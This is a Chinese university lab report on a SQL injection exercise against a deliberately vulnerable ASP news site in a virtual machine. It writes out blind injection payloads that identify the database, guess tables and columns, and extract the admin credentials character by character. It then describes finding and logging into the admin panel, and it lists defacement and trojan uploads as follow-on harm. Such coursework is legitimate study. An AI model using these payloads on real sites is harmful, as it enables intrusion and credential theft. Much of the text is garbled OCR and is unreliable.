SQL注入攻击实验报告x

实验报告

实验名称 : SQL 注入攻击)

一、 实验目的

通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加 强对Wet攻击的防范。

二、 实验环境

描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web服务器、客户机 等信息。

宿主机(客户机):操作系统为 Windows 10,IP为,在主机上安装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回 适配器,桥接模式,实现宿主机与虚拟机之间的网络通信,

虚拟机(Web服务器):操作系统为 Windows XP, IP为,

本实验利用windows的iis 服务搭建了一个有SQL注入漏洞的网站“ ASP新 闻发布系统”,以该网站为目标,对其实施 SQL注入攻击。

本实验所需工具如下:

IIS 是 In ternet In formation Server 的缩写,是微软提供的 In ternet 服务

器软 件,包括Web FTP Mail等服务器,也是目前常用的服务器软件。版本不限。

“啊 D'注入工具:对“ MSSQL显错模式”、“ MSSQL不显错模式”、

“ Access ”等数 据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫 描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。

“ ASP新闻发布系统” 0k3w源码。

三、 实验内容

(一)配置实验环境,

首先选择网络适配器,安装环回适配器,在主机上安装 VmwarePlayer,成功启

动虚拟机。接着配置宿主机和虚拟机的IP,如图

如鸭宓韵站M6,矗可咗取兰為詡鮒IP £&.逵删.你愛養从网 屯雋諭苗細也義晦电国酌pm

10 ?4出勺 I

子网?屮

要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge

甩豁身

甩豁身份验证共享

VMware Virtual Ethernet Adapter for VMnetB

5d^〔C}...

此连接便用下列環目Q】:

创Microsoft网角喜户M

^pVMware E ridgefrroto col

侧 丰训UlBUfl同雷』;紗4釉7印机共享

可j.穗路融5扑飆團应程序

叼 x Internet协议版本4仃匚P/1M4)

□ x Microsoft网晤适配器务菇传^器刃谀

词 铠踏剧5扑雄现玦卽器I/O驱动思序

Z?Microsoft LLDP确彊取动理囱

安装(N)十 卸議〔U)

然后,验证宿主机和虚拟机是否联通,结果显示连接成功。

licrosolt [|]J^-^. HX D. 105861

Cc) EiOlS fticrorolt CnTpnr讥inr.“嚟留虧,自枚#1 °

C:\V LHLUWS\sv3tem;iZ丹di^wi z;

C: \F IM1A.IS\3¥Ster?3Z>t]in£ LyL. Itt. IS. _1

~rpPing 192,163. IS. 11具有32字节的滋据: 13Q.

~rp

Ping 192,163. IS. 11具有32字节的滋据: 13Q. L68Llfl.ll 192. L68; 13.11 的凰宴:

192.. Ifil Ifl. 11 的硬:

1BQ. L68L 13.11 的El复:

字节=22 时|'Bj<Lnis 尹在監时I乐1ms 孚节=翌B?间叽昭 宇T=32时间€Lms

TTL=12R

HL=123

T7L=12B

TTL-123

的2 lb8* 13.11

的2 lb8* 13.11尉Pina统计恒即:

数据包:已发送=4.已騒 =4.丢失 肚返苗屋的洁计时囚⑼$秒为单位);

昙菲-Uns*脣甚=One,丰均-】ns

0 (ra丢失h

C; \fINDOVSK^eoSaMnc 19L lfi8.18. 9

手衣"冒I共百

衣"冒I

共百

Pins 192」矩18. 9具有32字节的数据:

192,168L 1S.9的冋真:字节=32吋 162. 16& 18.0 的

15Q. 163. L3.9 的

152. 153. :3.9的回复;宇节弓迂flj

|B]= ir;-' |Ej<liri: |C<1IH9

TTL=128

TTL=12£ TTL-:屈

TTL=123

192,16E. IS. 0 的 Ping 领计信息,:

数据赳:已发送二4,已接收二弘丢尖= 在返彳苯的估计时间似呈砂为学位):

畐坯二Oree,苣■弋=晁,辛內=Orc

C;\TimXj¥S\cvEtora33>

最后在虚拟机上安装IIS程序,打开浏览器,输入地址“”,检查网站搭建情况。

成功!

(二)寻找注入点

在宿主机上,打开网页id=95,可以正常打开页面。

O ? " - I32.16fl.149 in jj

刃衣弋同址诗4

,?才STF;^r+ ■ iT hURmbmyb 乓?

AEF宥工坟已痕轨佩E

新円帝无

冈幡窃宁同忻KfE |

|鬲牯富科|平

哥祠宾诅:詰內堀 阿培囲悴 囱矽 人和新目11畔轉 僻新可

进行注入测试,键入id=95 and仁1 ,返回页面不变

0 http^/191168,18^9/list^sp?id=9S^Cand^01=l

三HE

网站首页赫破冊1

刚帶安全网页討作

网姑远莒1

平百跚

耐賁讯 诂内啦I两皓和 冋詰鶴店I人删闻I业畀动态SMM4

键入id=95 and仁2,返回页面出错。

!屮jnv

!屮

*?* 4Rt*k

mirrjsiiwtM.i ?> iitiTRT

厂卿■制?

i码Fir胡己坤T磴.^.*HT-

irarCIknF^rtli:

.*4Hu|t10> t^iUin-

-ir幵?叮传■: w ^fen^r>

rntE in* 5K I? -内胡曲!■!?規-AZT Iff#

jpiT.” UCCiR

?*■? 'mTitt- a1

■ Z畀处

Kirrx-3?Ek IB 心* bv=n IMHvW Ffcipi?.>i7;和『?18曲1?出曲7 /IJm: K >3- fi

亠 ^Ki'i

MriiU^ 0 Ifiiim. IFT |Jd 0 相>n" fl测Mil馬妇 R IUfT■- iih-i- g』*加 DjHU 11 H JI.

Z J >r^r V D

? £y 电 a ■:*r Efc

因此,可确定该网站存在注入点。

判断数据库类型

用系统表的方法进行判断,分别键入

id=95 and (select coun t(*) from sysobjects)>0 id=95 and (select count(*) from msysobjects)>0

L勺 4- O 护丫倍网用于吉峙人知*胫工郢出.FX :

护丫倍网用于吉峙人知

*胫工郢

出.FX : ft JIT P*T4hl?{ ?J.EL^? JljH - IdOfl? 茶昨刖记天I t£ ?.^ = ^r = i上込口玄取甘财悴" /list ?E?. % IB fi

JbullVb.O ftiUMt Hl 10. Q. WR84)JmUiKllA3r? (lUOrt. l-.lt flcclr) 7hrTt/4?.O Efijl ZT 5^far:/5:F 36 ET 2. L &L品;L V

-屈:

fXT /Lint 叫

”时目:

'■'I -tEL-.M'Q I ? WJ

-Mtt:

‘I ?点““ £1出却*

!- 汀计厂:a n严 二.T .八 T. T卜乍 m" |l 1 I

? T亠 C

u * 直鮭 SRy ^fi

o Z1 {匕冉捡氏L:K确 18诧' -JT

3无昱蛊7票文 x 匚无理5埔员

兀窪且氏W歹

ii凹讥间F;两◎吃侗色可;±舁千

.绝占kJ射诩"纳洁虫直°

H打牛L:;川一」一?十百,¥氐音巧勺祐=疽配*映的仍梅-

xrr馆股锹Ltn -内:i ibA SR^ -刃當股

TL:xri.i.r三日军上

0 http7/1 g) 6B.1 &4/I lsLa5p?id>9S9h20and%d:L, .=l* l : ^20coun: . _」1 no nd

|tZOs^ubjeLh) a , |

卜7

心 I {fc?3ifcX?Ltflrit+ ?计尊<1国Jflisf 圍 无诂丘示叼氏

.单击肌証泗?麻*iJWifb

-fjw 辭.I验iR、主面"展后直越与所护朗碍

呦歸颈:Q0 -内宗眼石王i翫E -⑹淋

Eni?rn?lt: IS 身科彈

換卢肯息->.■

?错Q土:

fl. :i y=-; L t J£J D毗込也"£u£4"窕k;JUJM£」M

":-n,aft J.t曹彌命I坯找丁爭戒「曽It晋湎■叩”吋?吐[口 诵走它丄芒存坠 ⑺住它的名月耙州吕是些止墨口

ALflK ?it>j IK 临 fj

Hnnik^ o 鼻諒亠叭 mr io n:苗伸刊1〕^phVekKvr^P as QOCML 1讼E 'hdtii) 逊0. 2^3. 22 弘ftri,筠3F- 36 SB

Z. K Hala^r L.O

?网自.;

Ji£t /I i L E.

i ItH:!

羽I】心忆月咱.I再箔ze

-*轴却

H ■ ■: 3 1ST : ft 审站I

IB

两者返回均出错,可知是access数据库

猜测表名

一般网站后台的管理员都默认在表 admin中,我们先试一下,键入:

id=95 and (select coun t(*) from adm in)v>0

i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀” | Q hnp/<192.168.

i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀

Sit

幅;登亭主圧

幅;

登亭

主圧

返回页面正常,可知该网站后台数据库中存在着表名为 admin的表。

猜测字段名不同公司网站有不同的字段名, 但一般都有三个字段,分别记录ID

号、用户名和密码,常用的字段名为:id, username, password0

分别键入 id=95 and (select coun t(id) from adm in)v>0

id=95 and (select coun t(user name) from adm in)v>0

id=95 and (select coun t(password) from adm in)v>0

? http;Fig2_16BJ &g,li£t.agp "已=9占%2Darid%2[X2E4ct%20ccii^^^^^0frQ<n%JDB<jrni 巧==,戈* ▼

丄却厂无養二了网5t+ ) <rt£^ra?4^*> 鼾闫良T

丄却厂无養二了网

5t+ ) <rt£^ra?4^*> 鼾闫良T 立殆主_比

宣呈

re :KBQtram%2Cadi $ 右〒

.班

kJ K O W

AErMffijr柿茶塢w“

三者返回均正常。

 可知,表 admin 中存在的三个字段:id,user name, password。

 注:“username”的截图损坏,但是返回正常,望教员通融。

猜测管理员用户名和密码

确定表 admin 中有几条记录,键入 id=95 and (select count(*) from

admi n)=1返回页面正常。

可知,表admin只有一条记录。

猜测用户名长度,键入 id=95 and (select len(username) from admin)=1 返 回出错,继续键入 id=95 and (select len(username) from admin)=2 返回出错,

继 续 测 试 3/4/5… ,

Ofrt

Ofrt卜ft620admdn)= 1_土

砖笊氓尸下和悴作:

-中三竝1脚■戒血2車M

”打开:-:'V 1“日主百,埜后査找与用需诘尉貝关瞬溺"

KHI RSiSr 50: 102 -內SJIF哥吾&衣-应 口停

kJ K O W

嶠『稠区拭布丟蚯沁B

融百贞 計曲讯 刚址安全I期山窗作 何帖込誉 平向设计 皿缰蜃岸 遢小剧站

直到返回页面正确。测试到5的时候,返回正常。可知,用户名长度为 5

猜测用户名内容,采用ASCII码分析法先猜测第1位,用二分法,键入id=95 and (select coun t(*) from admin where (asc(mid(username,1,1)))betwee n 30 and 125)<>0 返回正确,进一步缩小范围 between 70 and 100 ,between 85 and 100 ,

between 90 and 100 ,=97。

.' rd%20($elect%20cou&20^rom%20adnir%2Cwhereetc(mid[use<na=

讦4H

U K 0 W

抽闻复卅束魏讽?&

刚站首页

1新冈资讯

齡安全

网页制作

网站运莒

平面跻

刚给缩程1

1演示魁

可知第一个字符为a。

依此类推,猜测之后的每一位字符,

0 tll620CelectM20tnuntt")站lOftcwn%?如dmin%20wh* reCasdnitKuaem ame^^ZiN=100) ?

汪护I

汪护

I询托SIH:

1? iJ%20Wect%20a)unU*用20ho*n%2gdmln

1

? iJ%20Wect%20a)unU*用20ho*n%2gdmln咄

nei^(aM(nrtidCijwm dtne^3)J) -1 D9f) ■= ><)| 9 1

卜?

分 可护胡 1

”会弓九口 帐是1

辽n栓养

<J K 0 W

枯fTt闻崔甲工竝小丄

r

1珈帧讯

昭天全1

刚矚惟1

| 1*4站运曲

| ¥曲诳计

1厲络编程|

1渣示1斓

耐百丙 号阈资讯 內培安士 同丙阴作 帕运营平面设计 竜示酣

匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *W

匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|

refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *

W 口 Ei国詢 1

I it珂籽粧

二金董也口 |巖E: 现

O KO VV

r

网站苔页

1龄迎于

1昭丙对作

平面诺卄1

1畸坊稈

沌示画拈

?評噺週常相乎轶T*

最后得到用户名为admin

4.猜测密码,同理:

id=95 and (select len( password) from adm in)=6

9 //19^16S J a J/l istasp? kl=95%2Qa nd%2O(5elect%ZQI

ln(pa $sw<j nd)%20frci m%20a drnin)=d

k佥▼

T^L匚士绘示两 I

|

BH-) x ? D W. m ” 二1 軒可 1*珀立抽?_酣一

网站首页新闻资讯

励络安全囲页制作网结运营丨平面谡计昭集程演示昭

所以密码为6位。

9 ;elect%20count(t)%20from%20admin%20where%20%2l(asc(mid(password/5/5))) = 53)<:>0|p_^ 庇□无法显示网

) L《计算机网路技术3课t 〔新闻塗讯—文章分类—我芳x

>会员入口 咪号:注册I站內搜索:

>会员入口 咪号:

注册

I站內搜索:

卜会员入口 帐号:二][登录I注册站內搜索:

卜会员入口 帐号:

二][登录I注册

站內搜索:

r

网站首页1

新闻资讯1

兩络安全

网页制作1

网站运营1

1平面设计

网络编程

演示网站

U KO W

ASP新闻发布茶统泌启

ASP新闻炭布系纸曲?&

T

网站首页1

新闻资讯1

网络安全1

网页制作

网站运营1

平面设计1

网络编程1

演示网玄

0 telect%20count(*)%20from%20admin%20where%20%^

|)(asc(m id(pas$word,4,4))) = 52)<>0|

导航C无法显示网

浒) C《计算机网增技术》课毛; 新闻资讯■文章分类■我扌x

? .elect%20count(*)%20from%20adm泊%2时恥%20%

b(asc(mid(pas$word;3;3))) = 51)<>0 卜

导航D无法显示网

I 1

>会员入口 帐号;密码;注册I站内搜索;浒) 《计算机网珞技术》课1 D新闻资讯_文章分类■我

>会员入口 帐号;

密码;

注册

I站内搜索;

kJ KO W

恥P新闻发布系统泌.6

网站首页

新闻资讯1

网络安全

网页制作

网站运营1

平面设计

网络编程

演示网站

?(elect%20counte)%20from%20admin%20where9620%3

Nasc( m 1 d (p-asswo rd, 2^2}))=50) <> d|

牙航0无法显丁网

《计算和网菇扌爻术》课'

D軒闻资讯_袁童分奨_耳匚

计)

卜合员入口帐号;厨;登录注册

卜合员入口

帐号;

厨;

登录

注册

I站内鹹

卜会员入口豐录注册I詁内攫素:

卜会员入口

豐录

注册

I詁内攫素:

恥F新闻按布系毓讥币

r

两站首页1新闻资讯

励络安全

刚页制作

囲站运营

平面设计1

囲络编程1

演示网站

0 ?lect%20count(!t)%20from%20admin%20where%2D%2}(asc(mid(passwrdJ1f1)))=49)<>0 {:

薪阖遥讯文直碌毎

匚朝+葺□网航郴溟i

U代0 W

临F新闻绘布系坊帆点

F

网站首页

新闻资讯

网络安全I

网页制作

网站运营

I平面设计

I网貉编程

演示网站

0 唱1 ect%20count(^)%20from%20admln%20where%20%20[ascfnnidfpasswordr^fi)))^^4)<>0

导航L-无法显示网

肝)D新豳饥却送我E?

肝)

卜会员入口帐号:蔭码:登录

卜会员入口

帐号:

蔭码:

登录

注册

詁內撰索:

F

网站百页

I新闻资讯I

博络安全

网页制作

刚站运营

I平面设计

I网络编程

演示网站

最终得到密码为6位:123456。

(七)寻找到后台管理窗口 打开“啊D'软件,点击进入“管理入口检测”选 项,点击“检测管理入口”,进行检测,

可弔连橫租日录应鬼' //IS? 1fiR 1R 9/i n*rA^:/经

可弔连橫租日录应鬼

' //IS? 1fiR 1R 9/i n*rA^:/

经http"阳2? 366. 16.9/1^;^

^ httu: ///.. Adnii>/LnlK. up

**hl:Lp:Z/T92- 1&9. IS.9/wiitLri/indiK up

网殆呦止 http; //192 166, 16.9/

柠涮删入口

如图:打开检测到的各网址,测试是否为管理入口

可知为管理入口,如图:

?ihif 竹2托馴阳」闻筍呻

■ D

卜 ■CLJHWE)?' 专?W2

(八)登陆后台 找到后台管理窗口,,用刚刚得到的用户 名和密码登陆,后台 登陆成功。

K t> - * ■

砸 胃TgVHPHTW 耐憎M脚CKIMQ 轟?r 簪 R 土

MKIhMMIt曲看&后台 冷皆氏醫頁i?|<<111章常上卩.匚?+匚::!去耳”4"%1_尢

MKIhMMIt

曲看&后台 冷皆氏醫頁

i?|<<

111章常上卩.匚?+匚::!去耳”4"%1_尢Et mu *世■ 一丄孙:箪

MB4i

U h N ? < 缢mur rb h 史缶章

H ■宿i

okh tJ i^E ■■

鳴屉:岂:

t>ti Ii/ab^- jri-jja. om/

KrfltKi

iku^J

■E

di — ri-

-flpWBBI

髯倉串:層 ue W 町 W^qsM t mn

H口伽巾沪#1 匚".[■■Tp^LpnzTl

?丄的丽1: X

CMETSf?*f|= K

种迈快阳4CTER;<

四、实验结果及分析

SQL注入攻击过程。

1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在 SQL 注入问题, 如:就是普通的网页访问。

 只有对数据库进行动态查询的业务才可能存在 SQL注入,如:id=95,其中id = 95表示数据库查询变量,这种语句会在数据库中 执行,因此可能会给数据库带来威胁。

2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过 输入一 些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数据库 查询语句找到注入点。

3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度,以 及内容。这个过程可以通过网上大量注入工具快速实现, 并借助破解网站轻易破译用 户密码。

4) 寻找WEB管理后台入口。通常 WEBB台管理的界面不面向普通用户开放,要 寻找 到后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依次进行 尝试,就可以试出管理台的入口地址。

5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进行破坏行为,如篡 改网页、 上传木马、修改、泄漏用户信息等,并进一步入侵数据库服务器。

实验心得:

在实验的过程中遇到了很多困难, 配置上的, 环境上的, 还有一些需要注意的小 问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。

在整个实验中遇到的最大问题就是, 宿主机和虚拟机此前一直连不通, 通过宿主 机 ping 虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机才能 访问虚拟机上发布的网页。

 可见,防火墙还是有一定作用的, 但是对于网站来说开通 了防火墙就没办法访问网页了。